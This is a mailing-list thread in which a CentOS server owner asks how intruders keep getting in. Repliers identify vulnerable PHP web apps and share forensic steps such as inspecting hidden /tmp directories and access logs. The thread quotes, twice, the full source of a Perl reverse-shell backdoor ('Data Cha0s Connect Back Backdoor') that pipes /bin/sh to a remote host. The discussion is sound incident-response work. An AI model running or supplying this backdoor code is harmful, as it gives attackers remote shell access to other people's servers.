I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
--------------------------- #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n"; --------------------------------
A bit of simple Googling should point you in the right direction...
http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&...
Are you running Twiki open to the internet?
http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html
Will.
On 30/11/05, Ajay Sharma ssharma@revsharecorp.com wrote:
I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
#!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n";
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Ajay Sharma wrote:
I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit. I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited...
-Greg
Greg Bailey wrote:
Ajay Sharma wrote:
I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit. I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited...
-Greg
Same deal here. It had to do with have globals on in php. Also, the script lived in /tmp but was in a hidden directory, so be sure to run ls -al. I've forgotten the directory name... .something. I found in there the script, a zip file, tons of email addresses and so on. I removed it but it came back pretty quickly. If I recall, it first happened with a photo upload script and then they moved to a blog or forum script the user was running. Lots of Brazilian email addresses were involved and the mqueue was so full, that rm * would not work. I had to dump thousands at a time instead of the whole queue at once.
It is a good idea to go ahead and shut down sendmail or whichever you use as your loads will get out of hand.
Best, John Hinton
Greg Bailey wrote:
Ajay Sharma wrote:
I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br.
I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
I had someone do the same thing on a colocated box I have. Turns out I had an old version of PHPix (also a photo gallery) which someone was able to exploit. I discovered it by looking at the timestamp of the file(s) in /tmp (or /var/tmp in my case), and the start time for the processes (other than httpd) that were running as the "apache" user. Then, looking at the apache access_log, it was obvious which script was being exploited...
Thanks for the tip. I checked the /tmp folder closely and found a '...' directory. Why I didn't notice that first is beyond me. Anyway, it I saw the date and found the bunk script. Aparently it was a busted copy of WebCalendar: http://www.k5n.us/webcalendar.php
--Ajay
-
Ajay Sharma -
Greg Bailey -
John Hinton -
Will McDonald